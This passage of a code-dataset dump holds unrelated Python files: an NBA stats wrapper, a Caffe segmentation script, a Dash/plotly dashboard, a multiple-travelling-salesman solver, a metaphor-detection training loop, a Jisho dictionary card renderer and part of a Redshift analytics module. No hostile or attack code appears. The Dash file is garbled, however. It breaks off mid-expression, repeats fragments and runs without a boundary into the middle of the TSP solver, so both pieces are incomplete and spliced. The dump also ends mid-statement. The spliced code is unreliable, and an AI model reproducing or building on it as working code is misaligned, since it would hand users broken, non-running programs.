path under self.root.\n\n The incoming path is in UNIX form (/foo/bar.html). 
The outgoing path is in\n native form, with symlinks removed.\n\n \"\"\"\n path = os.sep.join([self.root] + path.split('/'))\n return realpath(path)\n\n\n def remove(self):\n \"\"\"Remove the filesystem fixture at self.root.\n \"\"\"\n if isdir(self.root):\n shutil.rmtree(self.root)\n","sub_path":"fsfix.py","file_name":"fsfix.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101731172","text":"from nba_api.stats.endpoints import leaguegamefinder, playergamelog, playernextngames, commonplayerinfo, playercareerstats\nfrom nba_api.stats.static import players, teams\n\nnba_players = players.get_players()\nnba_teams = teams.get_teams()\n\n\ndef get_player_info(player_id):\n commoninfo = commonplayerinfo.CommonPlayerInfo(player_id=player_id)\n\n return {'commoninfo': commoninfo.get_dict()}\n\n\ndef get_player_stats(player_id, season_year, season_type):\n career = playercareerstats.PlayerCareerStats(\n player_id=player_id, per_mode36='Totals')\n\n season = career.get_dict()\n season_stats = season['resultSets'][0]['rowSet'][-1]\n\n ppg = season_stats[26] / season_stats[6]\n ast = season_stats[21] / season_stats[6]\n reb = season_stats[20] / season_stats[6]\n\n return {'careerstats': season, 'PTS': \"{:.1f}\".format(ppg), 'AST': \"{:.1f}\".format(ast), 'REB': \"{:.1f}\".format(reb)}\n\n\ndef get_ids(player_name, team_name):\n player_info = [\n player for player in nba_players if player['full_name'] == player_name][0]\n player_id = player_info['id']\n\n team_info = [\n team for team in nba_teams if team['abbreviation'] == team_name][0]\n team_id = team_info['id']\n\n return {'player_id': player_id, 'team_id': team_id}\n\n\ndef get_games(player_id, season_year, season_type):\n game = playergamelog.PlayerGameLog(\n player_id=player_id, season=season_year, season_type_all_star=season_type)\n\n next_game = playernextngames.PlayerNextNGames(\n number_of_games=\"1\", 
player_id=player_id, season_all=season_year, season_type_all_star=season_type)\n\n return {'game': game.get_dict(), 'nextgame': next_game.get_dict()}\n","sub_path":"info/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"628766206","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport caffe\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os.path\nimport json\nimport scipy\nimport argparse\nimport math\nimport pylab\nfrom skimage import io\nfrom sklearn.preprocessing import normalize\nimport csv\nimport os\nfrom collections import Counter\n\n\n# In[ ]:\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=str, required=True, help=':the url of your model file')\nparser.add_argument('--weights', type=str, required=True, help=':the url of your weights file')\nparser.add_argument('--img_list_root', type=str, required=True, help=\":the original iamges' folder\")\nparser.add_argument('--output_csv', type=str, required=True, help=':where you want to output csv file')\nparser.add_argument('--output_image_root', type=str, required=True, help='where you want to output classified image files')\nargs = parser.parse_args()\nargs.img_list_root = args.img_list_root+'/'\nargs.output_image_root = args.output_image_root+'/'\n\n# model = '/home/bigdata/caffe-segnet/Segnet/Example_Models/segnet_model_driving_webdemo.prototxt'\n# weights = '/home/bigdata/caffe-segnet/Segnet/Models/caffemodel/segnet_weights_driving_webdemo.caffemodel'\n# img_list_root = '/home/bigdata/caffe-segnet/Segnet/testdata/'\n# output_csv_root = '/home/bigdata/temp.csv'\n# output_classified_image_root = '/home/bigdata/caffe-segnet/Segnet/temp/'\n\n\n# In[ ]:\n\n\n# initialize the net\nnet = caffe.Net(args.model, args.weights, caffe.TEST)\n\n\n# In[ ]:\n\n\n# fit the picture for caffe\ntransformer = caffe.io.Transformer({'data': 
net.blobs['data'].data.shape})\ntransformer.set_transpose('data', (2,0,1))\ntransformer.set_raw_scale('data', 255)\ntransformer.set_channel_swap('data', (2,1,0))\n\n\n# In[ ]:\n\n\n# define the colour of each class and the label_colours which index correspond with the class name\nSky = [128,128,128]\nBuilding = [128,0,0]\nPole = [192,192,128]\nRoad_marking = [255,69,0]\nRoad = [128,64,128]\nPavement = [60,40,222]\nTree = [128,128,0]\nSignSymbol = [192,128,128]\nFence = [64,64,128]\nCar = [64,0,128]\nPedestrian = [64,64,0]\nBicyclist = [0,128,192]\nRoad_Marking = [0,0,0]\nlabel_colours = np.array([Sky, Building, Pole, Road_Marking, Road, Pavement, Tree, SignSymbol, Fence, Car, Pedestrian, Bicyclist])\n\n\n# In[ ]:\n\n\n# defien a list to store all image root\nimage_name_list = os.listdir(args.img_list_root)\ncsv_content = []\nimage_root_list = []\nfor name in image_name_list:\n image_root_list.append(args.img_list_root+name)\n csv_content.append([name.split('_')[1], name.split('_')[2], name.split('_')[3]])\n\n\n# In[ ]:\n\n\n# pocess for each image\nfor index, each_image in enumerate(image_root_list):\n net = caffe.Net(args.model, args.weights, caffe.TEST)\n im = caffe.io.load_image(each_image)\n net.blobs['data'].data[...] 
= transformer.preprocess('data', im)\n print('image - '+repr(each_image)+' is processing....')\n out = net.forward()\n predicted = net.blobs['argmax'].data\n ind = np.squeeze(predicted[0,:,:,:])\n ind_temp = np.reshape(ind, -1)\n ind_dic = Counter(ind_temp.tolist())\n # ----------------------------------------------\n # the code blow is used for save classified image \n r = ind.copy()\n b = ind.copy()\n g = ind.copy()\n for l in range(0,11):\n r[ind == l] = label_colours[l, 0]\n g[ind == l] = label_colours[l, 1]\n b[ind == l] = label_colours[l, 2]\n rgb = np.zeros((ind.shape[0], ind.shape[1], 3))\n rgb[:,:,0] = r/255.0\n rgb[:,:,1] = g/255.0\n rgb[:,:,2] = b/255.0\n io.imsave(args.output_image_root+repr(index)+'.jpg',rgb)\n # ----------------------------------------------\n for each_class in range(12):\n if each_class in ind_dic.keys():\n csv_content[index].append(ind_dic[each_class])\n else:\n csv_content[index].append(0)\n print('image - ', index, ' process finished....')\n\n\n# In[ ]:\n\n\n# write the content into csv file\nwith open(args.output_csv, 'w') as f:\n writer = csv.writer(f)\n writer.writerows(csv_content)\n\n","sub_path":"batch_segmentation.py","file_name":"batch_segmentation.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4718494","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\nimport plotly.plotly as py\nfrom plotly.graph_objs import *\nimport pandas as pd\nimport plotly.figure_factory as ff\nfrom geopy.geocoders import Nominatim\nimport datetime\n\nlt=pd.read_csv('export.csv', sep=';', \n error_bad_lines=False,header=None)\nlt.head()\nlt.fillna(0)\nfor c in [1,2,3]:\n lt[c]=lt[c].str.strip().str.lower()\nlt[5]=lt[5].str.strip().replace('(', '').replace(')', 
'')\n\nlt[0]=pd.to_datetime(lt[0])\n#lt=lt[(lt[0].dt.year==2018)&(lt[0] =datetime.date(2018, slider[0] ,1)) & (lt[0]=datetime.date(2018, slider[0] ,1)) & (lt[0]=datetime.date(2018, slider[0] ,1)) & (lt[0]\", places[finalPath[i]], end = \"\")\n subdest.append(places[finalPath[i]])\n \n # TSP optimization using mip\n else:\n model = Model()\n x = [[model.add_var(var_type=BINARY) for j in V] for i in V]\n y = [model.add_var() for i in V]\n\n # objective function: minimize the distance\n model.objective = minimize(xsum(c[i][j]*x[i][j] for i in V for j in V))\n\n # constraint : leave each point only once\n for i in V:\n model += xsum(x[i][j] for j in V - {i}) == 1\n\n # constraint : enter each point only once\n for i in V:\n model += xsum(x[j][i] for j in V - {i}) == 1\n\n # subtour elimination\n for (i, j) in product(V - {n}, V - {n}):\n if i != j:\n model += y[i] - (n+1)*x[i][j] >= y[j]-n\n\n # optimizing\n status = model.optimize(max_seconds=30)\n print(status)\n\n print(\"=========================================================\")\n print(\"Tour\", str(tour+1), \":\")\n print(\"Subgraph Matrix:\")\n printMatrix(c, dest)\n print(\"\")\n\n # checking if a solution was found\n if model.num_solutions:\n print('route with total distance found: ', model.objective_value)\n print(startCity, end = \"\")\n nc = n\n subdest = []\n while True:\n nc = [i for i in V if x[nc][i].x >= 0.99][0]\n print(\" ->\", places[nc], end = \"\")\n subdest.append(places[nc])\n if nc == n:\n break \n else:\n print(model.objective_bound) \n\n print(\"\")\n print(\"\")\n\n # visualize the graph\n visualize(G, startCity, subdest, nodes, tour)\n\n plt.show()\n\n\ndef eucledian(point1, point2):\n return (math.sqrt((point1.x-point2.x)**2 + (point1.y-point2.y)**2))","sub_path":"src/mtsp.py","file_name":"mtsp.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499559151","text":"from util import 
get_num_lines, get_pos2idx_idx2pos, index_sequence, get_vocab, embed_indexed_sequence, \\\n get_word2idx_idx2word, get_embedding_matrix, write_predictions, get_performance_VUAverb_val\nfrom util import TextDatasetWithGloveElmoSuffix as TextDataset\nfrom util import evaluate\nfrom model import RNNSequenceModel\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport csv\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport random\n\nprint(\"PyTorch version:\")\nprint(torch.__version__)\nprint(\"GPU Detected:\")\nprint(torch.cuda.is_available())\nusing_GPU = True\n\n\"\"\"\n1. Data pre-processing\n\"\"\"\n\n'''\n1.2 TroFi\nget raw dataset as a list:\n Each element is a triple:\n a sentence: string\n a index: int: idx of the focus verb\n a label: int 1 or 0\n'''\nraw_trofi = []\n\nwith open('../data/TroFi/TroFi_formatted_all3737.csv') as f:\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n sentence = line[1]\n label_seq = [0] * len(sentence.split())\n pos_seq = [0] * len(label_seq)\n verb_idx = int(line[2])\n verb_label = int(line[3])\n label_seq[verb_idx] = verb_label\n pos_seq[verb_idx] = 1 # idx2pos = {0: 'words that are not focus verbs', 1: 'focus verb'}\n raw_trofi.append([sentence.strip(), label_seq, pos_seq])\n\n\nprint('TroFi dataset division: ', len(raw_trofi))\n\n\n\n\"\"\"\n2. Data preparation\n\"\"\"\n'''\n2. 1\nget vocabulary and glove embeddings in raw dataset \n'''\n# vocab is a set of words\nvocab = get_vocab(raw_trofi)\n# two dictionaries. : 0, : 1\nword2idx, idx2word = get_word2idx_idx2word(vocab)\n# glove_embeddings a nn.Embeddings\nglove_embeddings = get_embedding_matrix(word2idx, idx2word, normalization=False)\n# elmo_embeddings\n# set elmos_trofi=None to exclude elmo vectors. 
Also need to change the embedding_dim in later model initialization\nelmos_trofi = h5py.File('../elmo/TroFi3737.hdf5', 'r')\n\n\n'''\n2. 2\nembed the datasets\n'''\nrandom.seed(0)\nrandom.shuffle(raw_trofi)\n\n# second argument is the post sequence, which we don't need\nembedded_trofi = [[embed_indexed_sequence(example[0], example[2], word2idx,\n glove_embeddings, elmos_trofi, None),\n example[2], example[1]]\n for example in raw_trofi]\n\n\n\n'''\n2. 3 10-fold cross validation\n'''\n# separate the embedded_sentences and labels into 2 list, in order to pass into the TextDataset as argument\nsentences = [example[0] for example in embedded_trofi]\nposs = [example[1] for example in embedded_trofi]\nlabels = [example[2] for example in embedded_trofi]\n# ten_folds is a list of 10 tuples, each tuple is (list_of_embedded_sentences, list_of_corresponding_labels)\nten_folds = []\nfold_size = int(3737 / 10)\nfor i in range(10):\n ten_folds.append((sentences[i * fold_size:(i + 1) * fold_size],\n poss[i * fold_size:(i + 1) * fold_size],\n labels[i * fold_size:(i + 1) * fold_size]))\n\nidx2pos = {0: 'words that are not focus verbs', 1: 'focus verb'}\n\noptimal_f1s = []\noptimal_ps = []\noptimal_rs = []\noptimal_accs = []\npredictions_all = []\nfor i in range(10):\n '''\n 2. 
3\n set up Dataloader for batching\n '''\n training_sentences = []\n training_labels = []\n training_poss = []\n for j in range(10):\n if j != i:\n training_sentences.extend(ten_folds[j][0])\n training_poss.extend(ten_folds[j][1])\n training_labels.extend(ten_folds[j][2])\n training_dataset_trofi = TextDataset(training_sentences, training_poss, training_labels)\n val_dataset_trofi = TextDataset(ten_folds[i][0], ten_folds[i][1], ten_folds[i][2])\n\n # Data-related hyperparameters\n batch_size = 10\n # Set up a DataLoader for the training, validation, and test dataset\n train_dataloader_trofi = DataLoader(dataset=training_dataset_trofi, batch_size=batch_size, shuffle=True,\n collate_fn=TextDataset.collate_fn)\n val_dataloader_trofi = DataLoader(dataset=val_dataset_trofi, batch_size=batch_size, shuffle=False,\n collate_fn=TextDataset.collate_fn)\n \"\"\"\n 3. Model training\n \"\"\"\n '''\n 3. 1 \n set up model, loss criterion, optimizer\n '''\n # Instantiate the model\n # embedding_dim = glove + elmo + suffix indicator\n # dropout1: dropout on input to RNN\n # dropout2: dropout in RNN; would be used if num_layers=1\n # dropout3: dropout on hidden state of RNN to linear layer\n RNNseq_model = RNNSequenceModel(num_classes=2, embedding_dim=300+1024, hidden_size=300,\n num_layers=1, bidir=True,\n dropout1=0.5, dropout2=0, dropout3=0.2)\n # Move the model to the GPU if available\n if using_GPU:\n RNNseq_model = RNNseq_model.cuda()\n # Set up criterion for calculating loss\n loss_criterion = nn.NLLLoss()\n # Set up an optimizer for updating the parameters of the rnn_clf\n rnn_optimizer = optim.Adam(RNNseq_model.parameters(), lr=0.001)\n # Number of epochs (passes through the dataset) to train the model for.\n num_epochs = 10\n\n '''\n 3. 
2\n train model\n '''\n train_loss = []\n val_loss = []\n performance_matrix = None\n val_f1 = []\n val_p = []\n val_r = []\n val_acc = []\n train_f1 = []\n # A counter for the number of gradient updates\n num_iter = 0\n model_index = 0\n comparable = []\n for epoch in range(num_epochs):\n print(\"Starting epoch {}\".format(epoch + 1))\n for (__, example_text, example_lengths, labels) in train_dataloader_trofi:\n example_text = Variable(example_text)\n example_lengths = Variable(example_lengths)\n labels = Variable(labels)\n if using_GPU:\n example_text = example_text.cuda()\n example_lengths = example_lengths.cuda()\n labels = labels.cuda()\n # predicted shape: (batch_size, seq_len, 2)\n predicted = RNNseq_model(example_text, example_lengths)\n batch_loss = loss_criterion(predicted.view(-1, 2), labels.view(-1))\n rnn_optimizer.zero_grad()\n batch_loss.backward()\n rnn_optimizer.step()\n num_iter += 1\n # Calculate validation and training set loss and accuracy every 200 gradient updates\n if num_iter % 200 == 0:\n avg_eval_loss, performance_matrix = evaluate(idx2pos, val_dataloader_trofi, RNNseq_model,\n loss_criterion, using_GPU)\n val_loss.append(avg_eval_loss)\n val_p.append(performance_matrix[1][0])\n val_r.append(performance_matrix[1][1])\n val_f1.append(performance_matrix[1][2])\n val_acc.append(performance_matrix[1][3])\n print(\"Iteration {}. Validation Loss {}.\".format(num_iter, avg_eval_loss))\n# avg_eval_loss, performance_matrix = evaluate(idx2pos, train_dataloader_trofi, RNNseq_model,\n# loss_criterion, using_GPU)\n# train_loss.append(avg_eval_loss)\n# train_f1.append(performance_matrix[1][1])\n# print(\"Iteration {}. 
Training Loss {}.\".format(num_iter, avg_eval_loss))\n print(\"Training done for fold {}\".format(i))\n\n \"\"\"\n 3.3\n plot the training process: MET F1 and losses for validation and training dataset\n \"\"\"\n# plt.figure(0)\n# plt.title('F1 for TroFI dataset on fold ' + str(i))\n# plt.xlabel('iteration (unit:200)')\n# plt.ylabel('F1')\n# plt.plot(val_f1, 'g')\n# # plt.plot(train_f1, 'b')\n# plt.legend(['Validation F1', 'Training F1'], loc='upper right')\n# plt.show()\n\n# plt.figure(1)\n# plt.title('Loss for TroFi dataset on fold ' + str(i))\n# plt.xlabel('iteration (unit:200)')\n# plt.ylabel('Loss')\n# plt.plot(val_loss, 'g')\n# # plt.plot(train_loss, 'b')\n# plt.legend(['Validation loss', 'Training loss'], loc='upper right')\n# plt.show()\n\n \"\"\"\n store the best f1\n \"\"\"\n print('val_f1: ', val_f1)\n idx = 0\n if math.isnan(max(val_f1)):\n optimal_f1s.append(max(val_f1[6:]))\n idx = val_f1.index(optimal_f1s[-1])\n optimal_ps.append(val_p[idx])\n optimal_rs.append(val_r[idx])\n optimal_accs.append(val_acc[idx])\n else:\n optimal_f1s.append(max(val_f1))\n idx = val_f1.index(optimal_f1s[-1])\n optimal_ps.append(val_p[idx])\n optimal_rs.append(val_r[idx])\n optimal_accs.append(val_acc[idx])\n\n\n\"\"\"\nprint out the performance\nplot the performance on each fold\n\"\"\"\nprint('F1 on TroFi by 10-fold = ', optimal_f1s)\nprint('Precision on TroFi = ', np.mean(np.array(optimal_ps)))\nprint('Recall on TroFi = ', np.mean(np.array(optimal_rs)))\nprint('F1 on TroFi = ', np.mean(np.array(optimal_f1s)))\nprint('Accuracy on TroFi = ', np.mean(np.array(optimal_accs)))\n# plt.figure(2)\n# plt.title('F1 for TroFi dataset on ten folds')\n# plt.xlabel('fold')\n# plt.ylabel('F1')\n# plt.plot(optimal_ps,'r')\n# plt.plot(optimal_rs,'b')\n# plt.plot(optimal_f1s,'g')\n# plt.plot(optimal_accs,'c')\n# plt.plot([np.mean(np.array(optimal_f1s))] * 10, 'y')\n# plt.legend(['precision for each fold', 'recall for each fold', 'F1 for each fold', 'accuracy for each fold', 'Average 
F1'], loc='upper right')\n# plt.show()\n","sub_path":"sequence/main_trofi.py","file_name":"main_trofi.py","file_ext":"py","file_size_in_byte":9537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362943621","text":"#!/usr/bin/env python\n\nimport sys, os\nimport json, urllib\nfrom urllib.parse import quote_plus\nfrom urllib.request import urlopen\nimport asyncio\nimport requests\nfrom PIL import Image, ImageFont, ImageDraw\n\nrequest = 'ケーキ'\nurl = 'http://jisho.org/api/v1/search/words?keyword=' + quote_plus(request)\nwith urlopen(url) as f:\n fdata = json.loads(f.read().decode('utf-8'))\n\ndata = fdata['data']\n#print(data)\n\n\"\"\"print(data[0]['japanese'][0]['word'] + '(' + data[0]['japanese'][0]['reading'] + ')\\n')\nprint(data[0]['senses'][0]['parts_of_speech'][0])\nprint('1. ' + data[0]['senses'][0]['english_definitions'][0])\nprint('2. ' + data[0]['senses'][1]['english_definitions'][0])\nprint('3. ' + data[0]['senses'][2]['english_definitions'][0])\"\"\"\n\nimageDir = './gen/'\nblack = (33, 33, 33, 255)\ngrey = (117, 117, 117, 255)\nwhite = (255, 255, 255, 255)\nfontTitle = ImageFont.truetype(imageDir + 'NotoSansCJKjp-Medium.otf', 36, encoding='utf-8')\nfontMain = ImageFont.truetype(imageDir + 'Roboto-Medium.ttf', 14, encoding='utf-8')\nfontFuri = ImageFont.truetype(imageDir + 'NotoSansCJKjp-Medium.otf', 12, encoding='utf-8')\nfontTags = ImageFont.truetype(imageDir + 'NotoSansCJKjp-Regular.otf', 10, encoding='utf-8')\nfontSmall = ImageFont.truetype(imageDir + 'Roboto-Medium.ttf', 10, encoding='utf-8')\n\ntemplate = Image.open(imageDir + 'jisho.png')\nbase = template\n\nif (data[0]['is_common']):\n base = Image.alpha_composite(base, Image.open(imageDir + 'jisho_cw.png'))\n common = True\nelse:\n common = False\n\ntxt = Image.new('RGBA', base.size, (255,255,255,0))\nd = ImageDraw.Draw(txt)\n\nif (data[0]['tags'] != []):\n if (data[0]['tags'][0][:8] == 'wanikani'):\n tag = 'wanikani level ' + 
data[0]['tags'][0][8:]\n else:\n tag = data[0]['tags'][0]\n w, h = fontTags.getsize(tag)\n x = (100 - w) / 2\n if (common):\n base = Image.alpha_composite(base, Image.open(imageDir + 'jisho_b2.png'))\n d.text((275 + x, 52), tag, font=fontTags, fill=white)\n else:\n base = Image.alpha_composite(base, Image.open(imageDir + 'jisho_b1.png'))\n d.text((275 + x, 28), tag, font=fontTags, fill=white)\n\nif ('word' in data[0]['japanese'][0]):\n d.text((24, 22), data[0]['japanese'][0]['word'], font=fontTitle, fill=black)\n w, h = fontTitle.getsize(data[0]['japanese'][0]['word'])\n W, H = fontFuri.getsize(data[0]['japanese'][0]['reading'])\n x = (w - W) / 2\n d.text((24 + x, 16), data[0]['japanese'][0]['reading'], font=fontFuri, fill=black)\nelse:\n d.text((24, 22), data[0]['japanese'][0]['reading'], font=fontTitle, fill=black)\n\ni = 0\nwordType = ''\nfor x in data[0]['senses'][0]['parts_of_speech']:\n if (i > 0):\n wordType += ', '\n wordType += x\n i += 1\nd.text((24, 77), wordType, font=fontSmall, fill=grey)\n\nix = 1\ni = 0\ndesc = '\\n'\ndescN = '\\n'\nfor x in data[0]['senses']:\n if (ix > 6):\n break\n if (i > 0):\n desc += '\\n'\n descN += '\\n'\n\n if (x['parts_of_speech'] != [] and ix > 1):\n if (ix > 5):\n break\n ii = 0\n wordType = ''\n for y in x['parts_of_speech']:\n if (ii > 0):\n wordType += ', '\n wordType += y\n ii += 1\n d.text((24, 77 + (ix * 17)), wordType, font=fontSmall, fill=grey)\n desc += '\\n'\n descN += '\\n'\n ix += 1\n\n descN += str(i + 1) + '.'\n descL = ''\n ii = 0\n for y in x['english_definitions']:\n if (ii > 0):\n descL += '; '\n descL += y\n ii += 1\n\n if (len(descL) > 48):\n desc += descL[:48] + '...'\n else:\n desc += descL\n\n i += 1\n ix += 1\n\nd.text((24, 72), descN, font=fontMain, fill=grey)\nd.text((40, 72), desc, font=fontMain, fill=black)\n\n\nout = Image.alpha_composite(base, txt)\nout.save(imageDir + 'output/output.png', 
'PNG')\n","sub_path":"jisho.py","file_name":"jisho.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"631952177","text":"import calendar\nimport collections\nimport gzip\nimport hashlib\nimport logging\nimport resource\nimport time\nimport zlib\nfrom copy import copy\nfrom csv import DictWriter\nfrom datetime import date, datetime, timedelta\nfrom enum import Enum, IntEnum\nfrom inspect import isclass\nfrom io import BytesIO, StringIO\nfrom itertools import chain\nfrom threading import Lock\nfrom types import MappingProxyType\nfrom uuid import uuid4\n\nimport pytz\nimport simplejson as json\nfrom _csv import reader\nfrom redis_lock import Lock as RedisLock\nfrom six import add_metaclass\n\nfrom hsredshift.analytics.filters import (\n\tget_filter, is_filter_param, lookup_filter_for_bind_param\n)\nfrom hsredshift.analytics.queries import RedshiftCatalogue\nfrom hsredshift.analytics.scheduling import (\n\tQueryRefreshPriority, RedshiftQueryMetaLockTimeoutError\n)\nfrom hsredshift.utils.encoders import HSRedshiftJSONEncoder\nfrom hsredshift.utils.sql import (\n\tQueryStatementGenerator, get_engine_from_environ,\n\tis_in_flight, run_redshift_background_statement\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass QueryDisplayVisual(IntEnum):\n\t\"\"\"\n\t\t# TABLE Result Sets Should be Structured As Follows:\n\t\ttable_result = {\n\t\t\t\"render_as\": \"list_table\",\n\t\t\t\"series\": {\n\t\t\t\t\t\"metadata\": {\n\t\t\t\t\t\t\"DRUID\": {},\n\t\t\t\t\t\t\"HUNTER\": {},\n\t\t\t\t\t\t\"MAGE\": {},\n\t\t\t\t\t\t\"PALADIN\": {},\n\t\t\t\t\t\t\"PRIEST\": {},\n\t\t\t\t\t\t\"ROGUE\": {},\n\t\t\t\t\t\t\"SHAMAN\": {},\n\t\t\t\t\t\t\"WARLOCK\": {},\n\t\t\t\t\t\t\"WARRIOR\": {},\n\t\t\t\t\t},\n\t\t\t\t\t\"data\": {\n\t\t\t\t\t\t\"DRUID\": [\n\t\t\t\t\t\t\t{},\n\t\t\t\t\t\t\t{},\n\t\t\t\t\t\t\t# ...\n\t\t\t\t\t\t],\n\t\t\t\t\t\t\"HUNTER\": [],\n\t\t\t\t\t\t\"MAGE\": 
[],\n\t\t\t\t\t\t\"PALADIN\": [],\n\t\t\t\t\t\t\"PRIEST\": [],\n\t\t\t\t\t\t\"ROGUE\": [],\n\t\t\t\t\t\t\"SHAMAN\": [],\n\t\t\t\t\t\t\"WARLOCK\": [],\n\t\t\t\t\t\t\"WARRIOR\": [],\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t}\n\n\t\t# CHART Result Sets Should Be Structured As Follows:\n\t\tchart_result = {\n\t\t\t\"render_as\": \"line_chart\",\n\t\t\t\"series\": [\n\t\t\t\t{\n\t\t\t\t\t\"name\": \"foo\",\n\t\t\t\t\t\"metadata\": {\n\t\t\t\t\t\t\"is_winrate_data\": True,\n\t\t\t\t\t\t\"num_data_points\": 100\n\t\t\t\t\t},\n\t\t\t\t\t\"data\": [\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"x\": None,\n\t\t\t\t\t\t\t\"y\": None\n\t\t\t\t\t\t},\n\t\t\t\t\t\t# ....\n\t\t\t\t\t]\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t\"\"\"\n\tCHART = 0\n\tTABLE = 1\n\n\nclass QueryRefreshInterval(Enum):\n\tNEVER = (0, -1)\n\tHOURLY = (1, 3600)\n\tEVERY_TWO_HOURS = (2, 7200)\n\tEVERY_THREE_HOURS = (3, 10800)\n\tEVERY_SIX_HOURS = (4, 21600)\n\tDAILY = (5, 86400)\n\n\tdef __init__(self, index, max_seconds):\n\t\tself.index = index\n\t\tself.max_seconds = max_seconds\n\n\nclass InvalidOrMissingQueryParameterError(Exception):\n\tdef __init__(self, message, query_name, parameter_name, value=None):\n\t\tsuper(InvalidOrMissingQueryParameterError, self).__init__(message)\n\t\tself.query_name = query_name\n\t\tself.parameter_name = parameter_name\n\t\tself.value = value\n\n\nclass RedshiftQueryMetaContextManager:\n\t\"\"\"A Reentrant Context Manager for synchronizing write access across Lambdas\"\"\"\n\tdef __init__(self, parameterized_query, global_context=False):\n\t\tself.global_context = global_context\n\t\tself.parameterized_query = parameterized_query\n\t\tself.cache = self.parameterized_query.catalogue.cache\n\t\tself.namespace = self.parameterized_query.catalogue.s3_unload_namespace\n\n\t\tif self.global_context:\n\t\t\tself.cache_key_meta = self.parameterized_query.unload_key\n\t\telse:\n\t\t\tself.cache_key_meta = self.parameterized_query.cache_key_meta\n\n\t\tself.lock_name = \"%s_%s\" % (self.namespace, 
self.cache_key_meta)\n\t\tself.serial_meta_access = self.parameterized_query.catalogue.serialize_meta_access\n\t\tself.cache_ttl_seconds = self.parameterized_query.query.cache_ttl_seconds\n\t\tself.meta = None\n\n\t\tif self.serial_meta_access:\n\t\t\t# This ensures no race conditions mutating the meta dict between Lambdas\n\t\t\tself.lock = RedisLock(\n\t\t\t\tself.cache,\n\t\t\t\tself.lock_name,\n\t\t\t\texpire=60,\n\t\t\t\tauto_renewal=True\n\t\t\t)\n\t\telse:\n\t\t\t# For testing this allows use of FakeRedis\n\t\t\tself.lock = Lock()\n\n\t\tself.depth = 0\n\t\tself.acquired = False\n\n\tdef __enter__(self):\n\t\t\"\"\"Blocks until we have exclusive write access to the query meta dict\n\n\t\tRaises RedshiftQueryMetaLockTimeoutError if the lock could not be\n\t\tacquired within the configured timeout. This might happen when an\n\t\tUNLOADed result set is taking a long time to be inserted into Redis.\n\t\t\"\"\"\n\n\t\tif not self.acquired:\n\t\t\tself.acquired = self.lock.acquire(\n\t\t\t\ttimeout=self.parameterized_query.query.meta_lock_wait_seconds\n\t\t\t)\n\t\t\tif not self.acquired:\n\t\t\t\traise RedshiftQueryMetaLockTimeoutError()\n\n\t\t\tif self.cache.exists(self.cache_key_meta):\n\t\t\t\tself.meta = json.loads(self.cache.get(self.cache_key_meta))\n\t\t\telse:\n\t\t\t\tself.meta = {}\n\n\t\tself.depth += 1\n\t\treturn self.meta\n\n\tdef __exit__(self, *exc):\n\t\tself.depth -= 1\n\t\tif self.depth == 0:\n\t\t\tmeta_val = json.dumps(\n\t\t\t\tself.meta,\n\t\t\t\tcls=HSRedshiftJSONEncoder,\n\t\t\t\tseparators=(\",\", \":\"),\n\t\t\t)\n\t\t\tself.cache.set(self.cache_key_meta, meta_val, ex=self.cache_ttl_seconds)\n\t\t\tself.lock.release()\n\t\t\tself.acquired = False\n\n\t\treturn False\n\n\nclass ParameterizedRedshiftQuery(object):\n\n\tdef __init__(self, query, supplied_parameters):\n\t\tself.query = query\n\t\tself.supplied_parameters = supplied_parameters\n\t\tself.verify_required_parameters(supplied_parameters)\n\n\t\tself.has_premium_values = 
False\n\n\t\tself.final_bind_params = {}\n\n\t\tfor param_name, bind in query.bind_params().items():\n\t\t\tfinal_val = None\n\n\t\t\t# Attempt to come up with a final_val for this param\n\t\t\t# First check whether it was provided directly, e.g. card_id\n\t\t\tif param_name in supplied_parameters:\n\t\t\t\tval_from_args = supplied_parameters[param_name]\n\t\t\t\tfinal_val = self._convert_val_to_bind_type(val_from_args, bind)\n\n\t\t\t# Second, check whether it was provided as a Filter Enum\n\t\t\tfilter = lookup_filter_for_bind_param(param_name)\n\t\t\tif final_val is None and filter:\n\t\t\t\tfilter_member = None\n\t\t\t\tfilter_name = filter.filter_name()\n\t\t\t\tif filter_name in supplied_parameters:\n\t\t\t\t\tsupplied_params_filter_val = supplied_parameters[filter_name]\n\t\t\t\t\tif supplied_params_filter_val in filter.__members__:\n\t\t\t\t\t\tfilter_member = filter[supplied_params_filter_val]\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = \"Invalid member %s for filter %s for query: %s\" % (\n\t\t\t\t\t\t\tsupplied_params_filter_val, filter_name, self.query.name\n\t\t\t\t\t\t)\n\t\t\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, filter_name)\n\n\t\t\t\tif filter_member and not self.query.is_supported_filter_member(filter, filter_member):\n\t\t\t\t\tmsg = \"%s is not supported or enabled for query: %s\" % (\n\t\t\t\t\t\tfilter_member.name, self.query.name\n\t\t\t\t\t)\n\t\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, filter_name)\n\n\t\t\t\tif filter_member is None:\n\t\t\t\t\tfilter_member = 